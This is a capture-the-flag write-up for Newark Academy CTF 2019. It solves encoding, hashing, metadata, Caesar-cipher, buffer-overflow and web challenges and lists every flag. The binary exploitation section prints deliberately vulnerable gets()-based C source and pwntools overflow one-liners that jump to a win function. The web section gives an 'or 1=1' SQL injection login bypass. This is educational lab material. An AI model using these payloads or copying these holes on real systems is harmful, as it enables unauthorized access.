Newark Academy CTF 2019 Notes

General Skills

Intro to Flags

Your flag is nactf{w3lc0m3_t0_th3_m4tr1x}.
FLAG : nactf{w3lc0m3_t0_th3_m4tr1x}

Join the Discord

Go to the NACTF home page and find the link to the Discord server. A flag will be waiting for you once you join. So will Austin.

FLAG : nactf{g00d_luck_h4v3_fun}

What the HEX?

What the HEX man! My friend Elon just posted this message and I have no idea what it means >:( Please help me decode it:

https://twitter.com/kevinmitnick/status/1028080089592815618?lang=en

Leave the text format: no need to add nactf{} or change punctuation/capitalization

Look at the tweet, then decode its text with From Hex.

FLAG : I was. Sorry to have missed you.

Off-base

It seems my friend Rohan won't stop sending cryptic messages and he keeps mumbling something about base 64. Quick! We need to figure out what he is trying to say before he loses his mind...

bmFjdGZ7YV9jaDRuZzNfMGZfYmE1ZX0=

Decode it as base64.

echo bmFjdGZ7YV9jaDRuZzNfMGZfYmE1ZX0= | base64 -d
FLAG : nactf{a_ch4ng3_0f_ba5e}

Cat over the wire

Open up a terminal and connect to the server at shell.2019.nactf.com on port 31242 and get the flag!

Use this netcat command in terminal:

nc shell.2019.nactf.com 31242

Simply connecting returned the flag.

$ nc shell.2019.nactf.com 31242
nactf{th3_c4ts_0ut_0f_th3_b4g}
FLAG : nactf{th3_c4ts_0ut_0f_th3_b4g}

Grace's HashBrowns

Grace was trying to make some food for her family but she really messed it up. She was trying to make some hashbrowns but instead, she made this:

f5525fc4fc5fdd42a7cf4f65dc27571c

I guess Grace is a really bad cook. But at least she tried to add some md5 sauce.

remember to put the flag in nactf{....}

Submit the hash to CrackStation (Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.).

FLAG : nactf{grak}

Get a GREP #0!

Vikram was climbing a chunky tree when he decided to hide a flag on one of the leaves. There are 10,000 leaves so there's no way you can find the right one in time... Can you open up a terminal window and get a grep on the flag?

bigtree.zip

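The archive is a nested directory tree, and the flag appears to be hidden somewhere inside it.
Search the files for nactf.

Reference: How to search for a string within a folder on Windows and write the results to a file | みずねノート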

$ findstr /s /i /n "nactf" *.txt
bigtree\branch8\branch3\branch5\leaf8351.txt:1:nactf{v1kram_and_h1s_10000_l3av3s}
FLAG : nactf{v1kram_and_h1s_10000_l3av3s}

Crypto

Vyom's Soggy Croutons

Vyom was eating a CAESAR salad with a bunch of wet croutons when he sent me this:

ertkw{vk_kl_silkv}

Can you help me decipher his message?

The20thDuck

Caesar cipher, ROT9.

FLAG : nactf{et_tu_brute}
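
The rotation does not have to be guessed: the flag format nactf{ is known plaintext, so every shift can be tried and checked against it. This is an added example, not part of the original write-up; caesar_shift and recover_shift are hypothetical names.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Rotate ASCII letters forward by `shift` (0-25); other bytes are copied. */
void caesar_shift(const char *in, char *out, int shift)
{
    size_t i;
    for (i = 0; in[i] != '\0'; i++) {
        unsigned char c = (unsigned char)in[i];
        if (islower(c))
            out[i] = (char)('a' + (c - 'a' + shift) % 26);
        else if (isupper(c))
            out[i] = (char)('A' + (c - 'A' + shift) % 26);
        else
            out[i] = (char)c;
    }
    out[i] = '\0';
}

/* Try every rotation and return the one whose output starts with the
 * known flag prefix, leaving that plaintext in out. Returns -1 if none. */
int recover_shift(const char *ct, const char *prefix, char *out)
{
    for (int shift = 0; shift < 26; shift++) {
        caesar_shift(ct, out, shift);
        if (strncmp(out, prefix, strlen(prefix)) == 0)
            return shift;
    }
    out[0] = '\0';
    return -1;
}

int main(void)
{
    const char *ct = "ertkw{vk_kl_silkv}"; /* ciphertext from the challenge */
    char pt[64];
    int shift = recover_shift(ct, "nactf{", pt);
    printf("ROT%d -> %s\n", shift, pt);
    return 0;
}
```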

Forensics

The MetaMeme

Phil sent me this meme and it's a little bit suspicious. The meme is super meta and it may be even more meta than you think.

Wouldn't it be really cool if it also had a flag hidden somewhere in it? Well you are in luck because it certainly does!

Inspect the metadata with pdfinfo.

$ pdfinfo metametametameta.pdf 
Subject:        nactf{d4mn_th15_1s_s0_m3t4}
Creator:        3-Heights(TM) Image to PDF Converter 4.10.16.0 (www.pdf-tools.com)
Producer:       3-Heights(TM) Image to PDF Converter Shell 4.10.16.0 (http://www.pdf-tools.com)
CreationDate:   Thu Aug 15 02:15:13 2019 EDT
ModDate:        Thu Aug 15 02:15:13 2019 EDT
Tagged:         no
UserProperties: no
Suspects:       no
Form:           none
JavaScript:     no
Pages:          1
Encrypted:      no
Page size:      742.5 x 407.25 pts
Page rot:       0
File size:      81951 bytes
Optimized:      no
PDF version:    1.7
FLAG : nactf{d4mn_th15_1s_s0_m3t4}

Binary Exploitation

BufferOverflow #0

The close cousin of a website for "Question marked as duplicate"

Can you cause a segfault and get the flag?

shell.2019.nactf.com:31475

bufover-0, bufover-0.c

bufover-0.c

#include <stdio.h>
#include <signal.h>

void win()
{
    printf("You win!\n");
    char buf[256];
    FILE* f = fopen("./flag.txt", "r");
    if (f == NULL)
    {
        puts("flag.txt not found - ping us on discord if this is happening on the shell server\n");
    }
    else
    {
        fgets(buf, sizeof(buf), f);
        printf("flag: %s\n", buf);
    }
}

void vuln()
{
    char buf[16];
    printf("Type something>");
    gets(buf);
    printf("You typed %s!\n", buf);
}

int main()
{
    /* Disable buffering on stdout */
    setvbuf(stdout, NULL, _IONBF, 0);

    /* Call win() on SIGSEGV */
    signal(SIGSEGV, win);

    vuln();
    return 0;
}

Redirecting execution to win() wins.

$ r2 bufover-0
 -- radare2 for FideOS, now with extra potato
[0x080490b0]> aaaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Finding function preludes
[x] Enable constraint types analysis for variables
[0x080490b0]> afl
0x080490b0    1 50           entry0
0x080490e3    1 4            fcn.080490e3
0x08049080    1 6            sym.imp.__libc_start_main
0x08049110    4 49   -> 40   sym.deregister_tm_clones
0x08049150    4 57   -> 53   sym.register_tm_clones
0x08049190    3 33   -> 30   entry.fini0
0x080491c0    1 2            entry.init0
0x08049330    1 1            sym.__libc_csu_fini
0x08049100    1 4            sym.__x86.get_pc_thunk.bx
0x0804923f    1 60           sym.vuln
0x08049030    1 6            sym.imp.printf
0x08049040    1 6            sym.imp.gets
0x08049334    1 20           sym._fini
0x080492d0    4 85           sym.__libc_csu_init
0x080491c2    4 125          sym.win
0x080490f0    1 1            sym._dl_relocate_static_pie
0x0804927b    1 73           main
0x08049090    1 6            sym.imp.setvbuf
0x08049070    1 6            sym.imp.__sysv_signal
0x08049000    3 32           sym._init
0x08049050    1 6            sym.imp.fgets
0x08049060    1 6            sym.imp.puts
0x080490a0    1 6            sym.imp.fopen

win is at 0x080491c2.

$ python -c "from pwn import *; print b'A'*28+p32(0x080491c2)" | nc shell.2019.nactf.com 31475
Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAA!
You win!
flag: nactf{0v3rfl0w_th4at_buff3r_18ghKusB}
FLAG : nactf{0v3rfl0w_th4at_buff3r_18ghKusB}

BufferOverflow #1

The close cousin of a website for "Question marked as duplicate" - part 2!

Can you redirect code execution and get the flag?

Connect at shell.2019.nactf.com:31462

#include <stdio.h>

void win()
{
    printf("You win!\n");
    char buf[256];
    FILE* f = fopen("./flag.txt", "r");
    if (f == NULL)
    {
        puts("flag.txt not found - ping us on discord if this is happening on the shell server\n");
    }
    else
    {
        fgets(buf, sizeof(buf), f);
        printf("flag: %s\n", buf);
    }
}

void vuln()
{
    char buf[16];
    printf("Type something>");
    gets(buf);
    printf("You typed %s!\n", buf);
}

int main()
{
    /* Disable buffering on stdout */
    setvbuf(stdout, NULL, _IONBF, 0);

    vuln();
    return 0;
}

This was the same as #0.

$ python -c "from pwn import *; print b'A'*28+p32(0x080491b2)" | nc shell.2019.nactf.com 31462
Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAA��!
You win!
flag: nactf{pwn_31p_0n_r3t_iNylg281}
FLAG : nactf{pwn_31p_0n_r3t_iNylg281}
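
Both binaries are exploitable because gets() writes into the 16-byte buf with no length limit. As an added example (not the challenge source or the author's code), here is a bounded replacement for that read; read_line_bounded and input_from are hypothetical names, and the input is constructed.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 16 /* same size as buf in vuln() */

/* Read one line into buf[size] without ever writing past it.
 * Returns the bytes stored, or -1 on EOF/error. *truncated is set if the
 * line did not fit; the excess is drained so it cannot reach the next read. */
int read_line_bounded(FILE *in, char *buf, size_t size, int *truncated)
{
    *truncated = 0;
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0'; /* whole line fit: strip the newline */
    } else {
        int c; /* no newline stored: discard the rest of the line */
        while ((c = fgetc(in)) != EOF && c != '\n')
            *truncated = 1;
    }
    return (int)len;
}

/* Hypothetical helper: a temporary file holding constructed input. */
FILE *input_from(const char *s)
{
    FILE *f = tmpfile();
    if (f != NULL) {
        fputs(s, f);
        rewind(f);
    }
    return f;
}

int main(void)
{
    /* Constructed input: one over-long line, then a short one. */
    FILE *in = input_from("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nnext\n");
    char buf[BUF_SIZE];
    int truncated;
    if (in == NULL) return 1;
    int n = read_line_bounded(in, buf, sizeof buf, &truncated);
    printf("stored %d bytes, truncated=%d: %s\n", n, truncated, buf);
    n = read_line_bounded(in, buf, sizeof buf, &truncated);
    printf("stored %d bytes, truncated=%d: %s\n", n, truncated, buf);
    fclose(in);
    return 0;
}
```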

Web Exploitation

Pink Panther

Rahul loves the Pink Panther. He even made this website:

http://pinkpanther.web.2019.nactf.com

I think he hid a message somewhere on the webpage, but I don't know where... can you INSPECT and find the message?

https://www.youtube.com/watch?v=2HMSnfeNf8c

Visiting the site shows exactly what you would expect: the Pink Panther.

The flag was in the page source.

FLAG : nactf{1nsp3ct_b3tter_7han_c10us3au}

Scooby Doo

Kira loves to watch Scooby Doo so much that she made a website about it! She also added a clicker game which looks impossible. Can you use your inspector skills from Pink Panther to reveal the flag?

http://scoobydoo.web.2019.nactf.com

On the game page you are told to click 1,000,000,000 times.
The target moves away when the mouse gets close, but it is not impossible to click.

In the browser inspector, set a breakpoint in animation.js, which handles the rendering.

The code appears to compare against clickCount, so overwriting its value yielded the flag.

FLAG : nactf{ult1m4T3_sh4ggY}

Dexter's Lab

Dee Dee,

Please check in on your brother's lab at dexterslab.web.2019.nactf.com. We know his username is Dexter, but we don't know his password! Maybe you can use a SQL injection?

Entering arbitrary input makes the page display the query.

The usual payload worked:

admin' or 1=1;#

FLAG : nactf{1nj3c7ion5_ar3_saf3_in_th3_l4b}

Afterword

This overlapped with MidakeCTF, so I could not play much. For now I am posting just the parts I wrote up while solving.